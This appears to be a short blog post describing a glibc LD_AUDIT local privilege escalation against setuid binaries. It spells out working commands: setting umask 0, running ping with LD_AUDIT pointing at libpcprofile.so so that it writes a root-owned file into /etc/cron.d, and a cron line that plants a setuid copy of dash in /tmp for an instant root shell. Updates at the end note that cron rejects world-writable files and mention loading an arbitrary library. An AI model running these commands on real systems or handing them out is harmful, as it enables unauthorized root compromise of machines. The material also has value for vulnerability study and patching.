In a nutshell, the problem is the following:
A whitespace-separated list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to selectively override functions in other shared libraries. For set-user-ID/set-group-ID ELF binaries, only libraries in the standard search directories that are also set- user-ID will be loaded.But, this is not the case with LD_AUDIT. Basically, you can load any library when executing a suid program, that will be executed with root permissions! The attack consists in finding an arbitrary library that will write a file to disk, that will be owned by root in case of executing a suid program.
The final trick is that the newly created process will inherit parent's umask. What does it mean? We can change the umask in our shell and then create a world writeable file with root rights!
A regular user being able to write files with root permissions is really a bad thing... It means that you can create an arbitrary shell script that will be executed by Cron with root rights. Yes, an instant root shell in the system!
$ umask 0
#arbitrary suid program
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# This library writes a file to disk when the PCPROFILE_OUTPUT
# environment variable is defined.
# There is another example with the liblftp-tasks library and
# the LFTP_HOME environment variable.
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
# Create an arbitrary but valid crontab(5) line in the file and wait for the execution
# This attack creates a suid shell named /tmp/exploit.
UPDATE: Using crontab files is not an option because Cron does not accept files that are group or world writable. The attacker must look for other options.
UPDATE: It is possible to upload an arbitrary library that will be loaded with root privileges, dropping a root shell.